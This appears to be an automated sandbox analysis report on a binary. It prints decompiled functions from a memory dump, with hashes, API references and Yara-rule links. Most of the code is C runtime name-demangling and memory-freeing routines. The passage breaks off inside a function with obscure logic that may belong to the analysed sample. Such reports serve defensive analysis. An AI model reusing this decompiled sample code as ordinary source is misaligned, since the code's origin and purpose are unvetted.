Instruction Fuzzy Hash: C8C114B0A046459FDF01CFECC894BADBBB5AF2A314F10495AE910AB3C1D77099C9DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B5444, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6E1B5444(void* __ebx, void* __edx, void* __edi, void* __esi, char** _a4, char _a8, char _a12) {
				signed int _v8;
				char _v24;
				char* _v28;
				char* _v32;
				char _v33;
				char _v44;
				char** _v48;
				char _v56;
				char _v64;
				signed int _t50;
				char** _t56;
				char** _t57;
				char** _t59;
				char* _t65;
				char** _t76;
				intOrPtr* _t77;
				intOrPtr _t78;
				char* _t85;
				char _t86;
				signed int* _t114;
				char* _t117;
				intOrPtr* _t120;
				signed int* _t121;
				intOrPtr _t123;
				intOrPtr* _t124;
				signed int _t126;

				_t116 = __edi;
				_t115 = __edx;
				_t50 =  *0x6e21801c; // 0x57d971a9
				_v8 = _t50 ^ _t126;
				_t84 = _a4;
				_t120 =  *0x6e221b68; // 0x0
				_v48 = _a4;
				_t86 =  *_t120;
				_t53 = _t86 + 0xffffffd0;
				_v33 = _t86;
				if(_t86 + 0xffffffd0 > 9) {
					_push(__edi);
					if(_t86 != 0x3f) {
						if(E6E1B58E3(_t120, "template-parameter-", 0x13) != 0) {
							if(E6E1B58E3(_t120, "generic-type-", 0xd) != 0) {
								if(_a12 == 0 || _v33 != 0x40) {
									_t56 = E6E1AF6E4( &_v56, 0x6e221b68, 0x40);
									L20:
									_t85 = _t56[1];
									_t117 =  *_t56;
								} else {
									_t117 = 0;
									_t85 = 0;
									 *0x6e221b68 = _t120 + 1;
								}
								goto L21;
							}
							_v32 = "`generic-type-";
							_t123 = _t120 + 0xd;
							_v28 = 0xe;
							L9:
							 *0x6e221b68 = _t123;
							E6E1B4197(_t115, _t116,  &_v44);
							if(( *0x6e221b70 & 0x00004000) == 0 ||  *0x6e221b78 == 0) {
								E6E1AFB8D(E6E1AF764( &_v56,  &_v32),  &_v32,  &_v44);
								_t65 =  &_v64;
								goto L14;
							} else {
								E6E1B4226( &_v44,  &_v24, 0x10);
								_t124 =  *0x6e221b78; // 0x0
								 *0x6e1ee1b4(E6E1CF009( &_v44,  &_v24));
								if( *_t124() == 0) {
									E6E1AFB8D(E6E1AF764( &_v64,  &_v32),  &_v32,  &_v44);
									_t65 =  &_v56;
									L14:
									_t56 = E6E1AFBAF( &_v32, _t65, 0x27);
									goto L20;
								}
								_v28 = 0;
								_push(_v28);
								_t56 = E6E1AF511( &_v44, _t71);
								goto L20;
							}
						}
						_v32 = "`template-parameter-";
						_t123 = _t120 + 0x13;
						_v28 = 0x14;
						goto L9;
					} else {
						_t76 = E6E1B468B(__edx,  &_v44, 0);
						_t117 =  *_t76;
						_t85 = _t76[1];
						_t77 =  *0x6e221b68; // 0x0
						_v32 = _t117;
						_v28 = _t85;
						_t78 = _t77 + 1;
						 *0x6e221b68 = _t78;
						if( *_t77 != 0x40) {
							_t79 = _t78 - 1;
							 *0x6e221b68 = _t78 - 1;
							E6E1AFA80( &_v32, (0 |  *_t79 != 0x00000000) + 1);
							_t85 = _v28;
							_t117 = _v32;
						}
						L21:
						if(_a8 != 0) {
							_t121 =  *0x6e221b60; // 0x0
							if( *_t121 != 9 && _t117 != 0) {
								_t59 = E6E1B2E9E(0x6e221b84, 8);
								if(_t59 != 0) {
									 *_t59 = _t117;
									_t59[1] = _t85;
									 *_t121 =  *_t121 + 1;
									 *(_t121 + 4 +  *_t121 * 4) = _t59;
								}
							}
						}
						_t57 = _v48;
						 *_t57 = _t117;
						_t57[1] = _t85;
						goto L27;
					}
				} else {
					_t114 =  *0x6e221b60; // 0x0
					 *0x6e221b68 = _t120 + 1;
					E6E1AFAB2(_t114, _t84, _t53);
					L27:
					return E6E1A93EA(_v8 ^ _t126);
				}
			}

APIs

Replicator::operator[].LIBVCRUNTIME ref: 6E1B5481
DName::operator=.LIBVCRUNTIME ref: 6E1B54D3

Strings

generic-type-, xrefs: 6E1B550C
@, xrefs: 6E1B55E9
template-parameter-, xrefs: 6E1B54E5

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator=Replicator::operator[]
String ID: @$generic-type-$template-parameter-
API String ID: 3211817929-1320211309
Opcode ID: df350d21080aadf0d674536ab45cb1704e298f9328da998077824d44135d2c80
Instruction ID: e2e251d0092b41ab63efa29da64d552dfa307e5599438af0abecbb34423550e7
Opcode Fuzzy Hash: df350d21080aadf0d674536ab45cb1704e298f9328da998077824d44135d2c80
Instruction Fuzzy Hash: 5C61E6B1D042099FDF01CFD4D554BEEBBBEAF19310F20441AD622A7280EB3599C5DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1229, Relevance: 15.3, APIs: 10, Instructions: 338
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1B1229(signed int* _a4, signed int* _a8) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char* _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				intOrPtr* _t134;
				signed int* _t136;
				signed char _t141;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				signed int* _t159;
				signed int* _t160;
				signed int _t161;
				signed char _t180;
				signed int _t181;
				signed int* _t187;
				signed int _t188;
				signed int _t189;
				void* _t197;
				signed int _t203;
				void* _t204;
				void* _t205;
				void* _t206;
				void* _t207;
				void* _t208;
				signed char _t210;
				signed char _t211;
				signed int _t221;
				intOrPtr _t226;
				intOrPtr* _t228;
				signed int _t229;
				void* _t232;
				signed int _t234;
				void* _t244;

				_t134 =  *0x6e221b68; // 0x0
				_t211 =  *_t134;
				if(_t211 == 0) {
					E6E1AFB49(_t211, _a4, 1, _a8);
					L93:
					_t136 = _a4;
					L94:
					return _t136;
				}
				_v16 = _v16 & 0x00000000;
				_t3 = _t134 + 1; // 0x1
				_t228 = _t3;
				_v12 = _v12 & 0x00000000;
				_t203 = _t211 & 0x000000ff;
				 *0x6e221b68 = _t228;
				_t232 = 2;
				_t244 = _t203 - 0x4e;
				if(_t244 > 0) {
					__eflags = _t203 - 0x4f;
					if(__eflags == 0) {
						_v32 = "long ";
						_v28 = 5;
						E6E1AFA1C( &_v16,  &_v32);
						L79:
						_v32 = "double";
						_t213 =  &_v16;
						_v28 = 6;
						E6E1AFC2F( &_v16,  &_v32);
						L80:
						_t141 = 0;
						_t204 = _t203 - 0x43;
						if(_t204 == 0) {
							_v32 = "signed ";
							_v28 = 7;
							L88:
							_t213 = E6E1AF764( &_v24,  &_v32);
							E6E1AFB8D(_t143,  &_v32,  &_v16);
							_v16 = _v32;
							_v12 = _v28;
							L89:
							_t147 = _a8;
							if( *_a8 != 0) {
								E6E1AFC87( &_v16, E6E1AFB1E(_t213,  &_v32, 0x20, _t147));
							}
							_t136 = _a4;
							 *_t136 = _v16;
							_t136[1] = _v12;
							goto L94;
						}
						_t205 = _t204 - _t232;
						if(_t205 == 0) {
							L33:
							_v32 = "unsigned ";
							_v28 = 9;
							goto L88;
						}
						_t206 = _t205 - _t232;
						if(_t206 == 0) {
							goto L33;
						}
						_t207 = _t206 - _t232;
						if(_t207 == 0) {
							goto L33;
						}
						_t208 = _t207 - _t232;
						if(_t208 == 0) {
							goto L33;
						}
						if(_t208 != 0x14) {
							goto L89;
						}
						L28:
						_t152 = (_t141 & 0x000000ff) - 0x45;
						if(_t152 == 0) {
							goto L33;
						}
						_t153 = _t152 - _t232;
						if(_t153 == 0) {
							goto L33;
						}
						_t154 = _t153 - _t232;
						if(_t154 == 0) {
							goto L33;
						}
						_t155 = _t154 - _t232;
						if(_t155 == 0 || _t155 == _t232) {
							goto L33;
						} else {
							goto L89;
						}
					}
					if(__eflags <= 0) {
						L76:
						 *0x6e221b68 = _t228 - 1;
						_t159 = E6E1B246E( &_v32);
						_t213 =  *_t159;
						_t229 = _t159[1];
						_v16 = _t213;
						_v12 = _t229;
						__eflags = _t213;
						if(_t213 != 0) {
							goto L80;
						}
						L59:
						_t136 = _a4;
						 *_t136 = _t213;
						_t136[1] = _t229;
						goto L94;
					}
					__eflags = _t203 - 0x53;
					if(_t203 <= 0x53) {
						_t210 = _t203 & 0x00000003;
						__eflags = _t210;
						L65:
						_t160 = _a8;
						_v16 = _v16 & 0x00000000;
						_v12 = _v12 & 0x00000000;
						_t221 =  *_t160;
						_t161 = _t160[1];
						_v32 = _t221;
						_v28 = _t161;
						__eflags = _t210 - 0xfffffffe;
						if(_t210 != 0xfffffffe) {
							__eflags = _t221;
							if(_t221 == 0) {
								_t234 = _t210 & 0x00000002;
								__eflags = _t210 & 0x00000001;
								if((_t210 & 0x00000001) == 0) {
									__eflags = _t234;
									if(_t234 != 0) {
										_v24 = "volatile";
										_v20 = 8;
										E6E1AFA1C( &_v16,  &_v24);
									}
								} else {
									_v24 = "const";
									_v20 = 5;
									E6E1AFA1C( &_v16,  &_v24);
									__eflags = _t234;
									if(_t234 != 0) {
										_v24 = " volatile";
										_v20 = 9;
										E6E1AFC2F( &_v16,  &_v24);
									}
								}
							}
							E6E1B3A75(_t210, _a4,  &_v16,  &_v32, 1);
							goto L93;
						}
						_v28 = _t161 | 0x00000800;
						E6E1B3A75(_t210,  &_v24,  &_v16,  &_v32, 0);
						_t229 = _v20;
						__eflags = 0x00000800 & _t229;
						if((0x00000800 & _t229) == 0) {
							_v32 = 0x6e1f2c0c;
							_v28 = 2;
							E6E1AFC2F( &_v24,  &_v32);
							_t229 = _v20;
						}
						_t213 = _v24;
						goto L59;
					}
					__eflags = _t203 - 0x58;
					if(_t203 == 0x58) {
						_v32 = "void";
						_v28 = 4;
						L12:
						_t213 =  &_v16;
						E6E1AFA1C( &_v16,  &_v32);
						goto L89;
					}
					__eflags = _t203 - 0x5f;
					if(_t203 != 0x5f) {
						goto L76;
					}
					_t180 =  *_t228;
					_t23 = _t228 + 1; // 0x2
					_t226 = _t23;
					_v5 = _t180;
					_t181 = _t180 & 0x000000ff;
					 *0x6e221b68 = _t226;
					__eflags = _t181 - 0x4e;
					if(__eflags > 0) {
						__eflags = _t181 - 0x53;
						if(__eflags > 0) {
							__eflags = _t181 - 0x55;
							if(_t181 == 0x55) {
								_v32 = "char32_t";
								L42:
								_v28 = 8;
								L26:
								_t213 =  &_v16;
								E6E1AFA1C( &_v16,  &_v32);
								L27:
								_t141 = _v5;
								goto L28;
							}
							__eflags = _t181 - 0x57;
							if(_t181 == 0x57) {
								_v32 = "wchar_t";
								L37:
								_v28 = 7;
								goto L26;
							}
							__eflags = _t181 + 0xffffffa8 - 1;
							if(_t181 + 0xffffffa8 > 1) {
								L60:
								_v32 = "UNKNOWN";
								goto L37;
							}
							_t51 = _t226 - 1; // 0x1
							 *0x6e221b68 = _t51;
							_t187 = E6E1B246E( &_v32);
							_t213 =  *_t187;
							_t229 = _t187[1];
							_v16 = _t213;
							_v12 = _t229;
							__eflags = _t213;
							if(_t213 != 0) {
								goto L27;
							}
							goto L59;
						}
						if(__eflags == 0) {
							_v32 = "char16_t";
							goto L42;
						}
						_t188 = _t181 - 0x4f;
						__eflags = _t188;
						if(_t188 == 0) {
							_t210 = 0xfffffffe;
							goto L65;
						}
						_t189 = _t188 - _t232;
						__eflags = _t189;
						if(_t189 == 0) {
							_v32 = "char8_t";
							goto L37;
						}
						__eflags = _t189 != 1;
						if(_t189 != 1) {
							goto L60;
						}
						_v32 = "<unknown>";
						_v28 = 9;
						goto L26;
					}
					if(__eflags == 0) {
						_v32 = "bool";
						_v28 = 4;
						goto L26;
					}
					__eflags = _t181 - 0x47;
					if(_t181 > 0x47) {
						__eflags = _t181 - 0x49;
						if(_t181 <= 0x49) {
							_v32 = "__int32";
							goto L37;
						}
						__eflags = _t181 - 0x4b;
						if(_t181 <= 0x4b) {
							_v32 = "__int64";
							goto L37;
						}
						__eflags = _t181 - 0x4d;
						if(_t181 > 0x4d) {
							goto L60;
						}
						_v32 = "__int128";
						goto L42;
					}
					__eflags = _t181 - 0x46;
					if(_t181 >= 0x46) {
						_v32 = "__int16";
						goto L37;
					}
					__eflags = _t181;
					if(_t181 == 0) {
						_t213 =  &_v16;
						 *0x6e221b68 = _t228;
						E6E1AFA80( &_v16, 1);
						goto L27;
					}
					__eflags = _t181 - 0x24;
					if(_t181 == 0x24) {
						_v32 = "__w64 ";
						_v28 = 6;
						E6E1AFAFC(_t226, _a4,  &_v32, E6E1B1229( &_v24, _a8));
						goto L93;
					}
					__eflags = _t181 + 0xffffffbc - 1;
					if(_t181 + 0xffffffbc > 1) {
						goto L60;
					} else {
						_v32 = "__int8";
						_v28 = 6;
						goto L26;
					}
				}
				if(_t244 == 0) {
					goto L79;
				}
				_t6 = _t203 - 0x43; // -67
				_t197 = _t6;
				if(_t197 > 0xa) {
					goto L76;
				}
				_t7 = _t197 + 0x6e1b1711; // 0x8bffffe5
				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M6E1B16F9))) {
					case 0:
						_v32 = "char";
						goto L6;
					case 1:
						_v32 = "short";
						_v28 = 5;
						goto L7;
					case 2:
						_v32 = "int";
						_v28 = 3;
						goto L7;
					case 3:
						_v32 = "long";
						L6:
						_v28 = 4;
						L7:
						_t213 =  &_v16;
						E6E1AFA1C( &_v16,  &_v32);
						goto L80;
					case 4:
						_v32 = "float";
						_v28 = 5;
						goto L12;
					case 5:
						goto L76;
				}
			}

APIs

shared_ptr.LIBCMT ref: 6E1B1295
shared_ptr.LIBCMT ref: 6E1B12DD
shared_ptr.LIBCMT ref: 6E1B1371
operator+.LIBVCRUNTIME ref: 6E1B13CA
DName::operator=.LIBVCRUNTIME ref: 6E1B13E2
shared_ptr.LIBCMT ref: 6E1B162C
DName::operator+.LIBCMT ref: 6E1B16A0
operator+.LIBVCRUNTIME ref: 6E1B16E9

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: shared_ptr$operator+$Name::operator+Name::operator=
String ID:
API String ID: 1464150960-0
Opcode ID: d6cbf2a7c6ce8aaa1ae2147d07505719c97c1cde3c4fafd4892b4626040f9dba
Instruction ID: 948867a118c20ac08525a954c312c7243323aea5492c70bcaa965ebe1787836f
Opcode Fuzzy Hash: d6cbf2a7c6ce8aaa1ae2147d07505719c97c1cde3c4fafd4892b4626040f9dba
Instruction Fuzzy Hash: B8D160B1E0420ADECF01CFD5C494BEEBBB8AB15314F22815AD521AB251D77486CAEFD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B47EC, Relevance: 15.3, APIs: 10, Instructions: 253
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1B47EC(void* __ebx, void* __edx, void* __edi, void* __esi, signed int* _a4) {
				signed int _v8;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v48;
				void* __ebp;
				signed int _t62;
				intOrPtr* _t64;
				char* _t65;
				signed int _t73;
				signed int _t79;
				signed int _t85;
				signed int _t86;
				signed int _t90;
				signed int _t126;
				signed int _t128;
				signed int* _t167;
				signed int _t169;
				signed int _t170;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				void* _t180;

				_t165 = __edx;
				_t62 =  *0x6e21801c; // 0x57d971a9
				_v8 = _t62 ^ _t177;
				_t64 =  *0x6e221b68; // 0x0
				_t126 =  *_t64;
				_t65 = _t64 + 1;
				_t167 = _a4;
				_t169 = _t126;
				 *0x6e221b68 = _t65;
				_v28 = _t169;
				_t180 = _t126 - 0x45;
				if(_t180 > 0) {
					__eflags = _t126 - 0x52;
					if(__eflags > 0) {
						__eflags = _t126 - 0x53;
						if(_t126 == 0x53) {
							 *_t167 =  *_t167 & 0x00000000;
							_t59 =  &(_t167[1]);
							 *_t59 = _t167[1] & 0x00000000;
							__eflags =  *_t59;
							L53:
							return E6E1A93EA(_v8 ^ _t177);
						}
						__eflags = _t126 - 0x54 - 2;
						if(_t126 - 0x54 > 2) {
							L51:
							_t167[1] = _t167[1] & 0x00000000;
							 *_t167 =  *_t167 & 0x00000000;
							_t167[1] = 2;
							goto L53;
						}
						L38:
						E6E1B4197(_t165, _t167,  &_v40);
						E6E1B4226( &_v40,  &_v24, 0x10);
						_t73 = E6E1CF009( &_v40,  &_v24);
						__eflags =  *0x6e221b70 & 0x00004000;
						_t170 = _t73;
						if(( *0x6e221b70 & 0x00004000) == 0) {
							L42:
							E6E161238( &_v24, 0x10, "%d", _t170 & 0x00000fff);
							_v36 = 0;
							_push(_v36);
							E6E1AF511( &_v40,  &_v24);
							_t79 = _v28 - 0x52;
							__eflags = _t79;
							if(_t79 == 0) {
								L50:
								_v32 = "`template-type-parameter-";
								L49:
								_v28 = 0x19;
								L47:
								E6E1AFB8D(E6E1AF764( &_v48,  &_v32),  &_v32,  &_v40);
								_push(0x27);
								L35:
								_push(_t167);
								E6E1AFBAF( &_v32);
								goto L53;
							}
							_t85 = _t79;
							__eflags = _t85;
							if(_t85 == 0) {
								goto L50;
							}
							_t86 = _t85 - 1;
							__eflags = _t86;
							if(_t86 == 0) {
								_v32 = "`generic-class-parameter-";
								goto L49;
							}
							__eflags = _t86 != 1;
							if(_t86 != 1) {
								goto L51;
							}
							_v32 = "`generic-method-parameter-";
							_v28 = 0x1a;
							goto L47;
						}
						_t128 =  *0x6e221b78; // 0x0
						__eflags = _t128;
						if(_t128 == 0) {
							goto L42;
						}
						 *0x6e1ee1b4(_t73 & 0x00000fff);
						_t90 =  *_t128();
						__eflags = _t90;
						if(_t90 == 0) {
							goto L42;
						}
						_v36 = 0;
						_push(_v36);
						E6E1AF511(_t167, _t90);
						goto L53;
					}
					if(__eflags == 0) {
						goto L38;
					}
					__eflags = _t126 - 0x4a;
					if(_t126 <= 0x4a) {
						_v32 = _v32 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						E6E1B0C7F( &_v32, 0x7b);
						_t129 = _t126 - 0x48;
						__eflags = _t126 - 0x48 - 2;
						if(_t126 - 0x48 <= 2) {
							_push( &_v40);
							E6E1AFC87( &_v32, L6E1B2085(_t129, _t167, _t169));
							E6E1AFCDE( &_v32, 0x2c);
						}
						_t172 = _t169 - 0x46;
						__eflags = _t172;
						if(_t172 == 0) {
							L32:
							E6E1AFC87( &_v32, E6E1B4197(_t165, _t167,  &_v40));
							E6E1AFCDE( &_v32, 0x2c);
							goto L33;
						} else {
							_t173 = _t172 - 1;
							__eflags = _t173;
							if(_t173 == 0) {
								L31:
								E6E1AFC87( &_v32, E6E1B4197(_t165, _t167,  &_v40));
								E6E1AFCDE( &_v32, 0x2c);
								goto L32;
							}
							_t174 = _t173 - 1;
							__eflags = _t174;
							if(_t174 == 0) {
								L33:
								E6E1AFC87( &_v32, E6E1B4197(_t165, _t167,  &_v40));
								L34:
								_push(0x7d);
								goto L35;
							}
							_t175 = _t174 - 1;
							__eflags = _t175;
							if(_t175 == 0) {
								goto L32;
							}
							__eflags = _t175 != 1;
							if(_t175 != 1) {
								goto L34;
							}
							goto L31;
						}
					}
					__eflags = _t126 - 0x4d;
					if(_t126 != 0x4d) {
						goto L51;
					}
					E6E1B4AFD(_t126, __edx, _t167, _t169,  &_v32);
					__eflags = _v28 - 1;
					if(_v28 > 1) {
						goto L51;
					}
					E6E1B47EC(_t126, __edx, _t167, _t169, _t167);
					L9:
					goto L53;
				}
				if(_t180 == 0) {
					_push(_t167);
					L6E1B2085(_t126, _t167, _t169);
					goto L9;
				}
				if(_t126 == 0) {
					 *0x6e221b68 = _t65 - 1;
					E6E1AF804(_t167, 1);
					goto L53;
				}
				if(_t126 == 0x30) {
					E6E1B4197(__edx, _t167, _t167);
					goto L9;
				}
				if(_t126 == 0x31) {
					__eflags =  *_t65 - 0x40;
					if( *_t65 != 0x40) {
						_v32 = _v32 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						E6E1B0C7F( &_v32, 0x26);
						_push( &_v40);
						E6E1AFB8D( &_v32, _t167, L6E1B2085(_t126, _t167, _t169));
					} else {
						_v32 = "NULL";
						 *0x6e221b68 = _t65 + 1;
						_v28 = 4;
						E6E1AF764(_t167,  &_v32);
					}
					goto L53;
				}
				if(_t126 == 0x32) {
					E6E1B516A(_t126, __edx, _t167, _t169, _t167);
					goto L9;
				}
				if(_t126 == 0x34) {
					E6E1B4430(_t167, _t167);
					goto L9;
				}
				_t130 = _t126 - 0x41;
				if(_t126 - 0x41 > 1) {
					goto L51;
				}
				E6E1B2947(_t130, __edx, _t167, _t169, _t167, _t169);
				goto L9;
			}

APIs

DName::operator+.LIBCMT ref: 6E1B48B8
UnDecorator::getSignedDimension.LIBCMT ref: 6E1B48C3
DName::DName.LIBVCRUNTIME ref: 6E1B48D4
UnDecorator::getSignedDimension.LIBCMT ref: 6E1B4979
UnDecorator::getSignedDimension.LIBCMT ref: 6E1B4996
UnDecorator::getSignedDimension.LIBCMT ref: 6E1B49B3
DName::operator+.LIBCMT ref: 6E1B49C8
UnDecorator::getSignedDimension.LIBCMT ref: 6E1B49EB
_swprintf.LIBCMT ref: 6E1B4A5C
DName::operator+.LIBCMT ref: 6E1B4AB3

Part of subcall function 6E1B2947: DName::DName.LIBVCRUNTIME ref: 6E1B296B

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$_swprintf
String ID:
API String ID: 138750261-0
Opcode ID: ad96ea7a986781982c2ef9c7d3792cbe6b5b8feb310c12f7bf08938647b4dc0e
Instruction ID: cfcc20ad873df9deb541bd50b5dfb96d00311531374e0e93010c5e8979a89314
Opcode Fuzzy Hash: ad96ea7a986781982c2ef9c7d3792cbe6b5b8feb310c12f7bf08938647b4dc0e
Instruction Fuzzy Hash: 7881C376D4024A9EEF10CBF5C855BFE777CAF19304F20851AD122A2080FB7959CAE7A5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF4B7, Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6E1CF4B7(void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;

				_t71 = __esi;
				_t36 = _a4;
				_t67 =  *_a4;
				_t75 = _t67 - 0x6e1f4e30;
				if(_t67 != 0x6e1f4e30) {
					E6E1D1BE4(_t67);
					_t36 = _a4;
				}
				E6E1D1BE4( *((intOrPtr*)(_t36 + 0x3c)));
				E6E1D1BE4( *((intOrPtr*)(_a4 + 0x30)));
				E6E1D1BE4( *((intOrPtr*)(_a4 + 0x34)));
				E6E1D1BE4( *((intOrPtr*)(_a4 + 0x38)));
				E6E1D1BE4( *((intOrPtr*)(_a4 + 0x28)));
				E6E1D1BE4( *((intOrPtr*)(_a4 + 0x2c)));
				E6E1D1BE4( *((intOrPtr*)(_a4 + 0x40)));
				E6E1D1BE4( *((intOrPtr*)(_a4 + 0x44)));
				E6E1D1BE4( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6E1CF1D4(_t75);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6E1CF23F(_t71, _t75);
			}

APIs

_free.LIBCMT ref: 6E1CF4CD

Part of subcall function 6E1D1BE4: HeapFree.KERNEL32(00000000,00000000,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?), ref: 6E1D1BFA
Part of subcall function 6E1D1BE4: GetLastError.KERNEL32(?,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?,?), ref: 6E1D1C0C

_free.LIBCMT ref: 6E1CF4D9
_free.LIBCMT ref: 6E1CF4E4
_free.LIBCMT ref: 6E1CF4EF
_free.LIBCMT ref: 6E1CF4FA
_free.LIBCMT ref: 6E1CF505
_free.LIBCMT ref: 6E1CF510
_free.LIBCMT ref: 6E1CF51B
_free.LIBCMT ref: 6E1CF526
_free.LIBCMT ref: 6E1CF534

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 66c12c7cff8d660735f9a507e9825974b197c0f3c2abcb37bf7919ff9991d432
Instruction ID: fe7ef610874317192652837513c99d2c43caa575054c6212ffc55d621fd21dba
Opcode Fuzzy Hash: 66c12c7cff8d660735f9a507e9825974b197c0f3c2abcb37bf7919ff9991d432
Instruction Fuzzy Hash: 6F21767AA04148AFCF41DFE4C880DDE7BB9BF08244F1185A6F515DB161EB31EA98DB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E17E461, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E17E461(void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _t44;
				intOrPtr _t46;
				void* _t48;
				signed int _t50;
				signed int _t52;
				char* _t53;
				void* _t54;
				signed int _t56;
				signed int _t60;
				void* _t62;
				intOrPtr _t64;
				signed int _t65;
				void* _t69;
				intOrPtr _t73;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t92;
				intOrPtr _t98;
				intOrPtr _t99;
				char _t101;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t108;
				intOrPtr _t111;
				intOrPtr _t113;
				intOrPtr _t117;
				char* _t118;
				signed int _t119;
				intOrPtr _t120;
				char* _t121;
				intOrPtr _t122;
				signed int _t126;
				void* _t127;
				void* _t128;
				char* _t129;
				char* _t130;
				char* _t131;
				signed int _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				void* _t138;
				void* _t139;
				void* _t142;

				_t102 = __edx;
				_t82 = __ebx;
				E6E1A9DBF(0x6e1e9e43, __ebx, __edi, __esi, 8);
				_t44 =  *0x6e218999 & 0x000000ff;
				_t83 =  *0x6e2189f0; // 0xc8c83700
				asm("cdq");
				 *0x6e21898c = 0;
				_t117 =  *0x6e218984 * 7 - _t83;
				 *0x6e218988 = _t117;
				_t133 = _t102;
				if(_t133 <= 0 && (_t133 < 0 || _t44 <= _t117)) {
					_t101 =  *0x6e218980; // 0x955603b8
					 *0x6e218994 = _t101;
					_t83 = _t117 - _t101 + 0xc;
					 *0x6e2189f0 = _t83;
					_t81 = _t83 - _t117 - 0x46;
					_t135 = _t81;
					 *0x6e218980 = _t81;
				}
				 *0x6e2189a0 = E6E17D29E(_t83);
				_t46 = E6E17D3E7();
				_t129 = _t128 - 0x10;
				 *0x6e218980 = _t46;
				_t118 = _t129;
				 *((intOrPtr*)(_t127 - 0x14)) = _t129;
				 *((intOrPtr*)(_t118 + 8)) = 0;
				 *((intOrPtr*)(_t118 + 0xc)) = 0;
				 *_t118 = 3;
				 *((intOrPtr*)(_t118 + 8)) = E6E18BA61(_t82, "6282", 0, _t118, _t135);
				 *(_t127 - 4) = 0;
				_push("Run Maste");
				_t48 = E6E181FAF(_t82, _t102, 0, _t118);
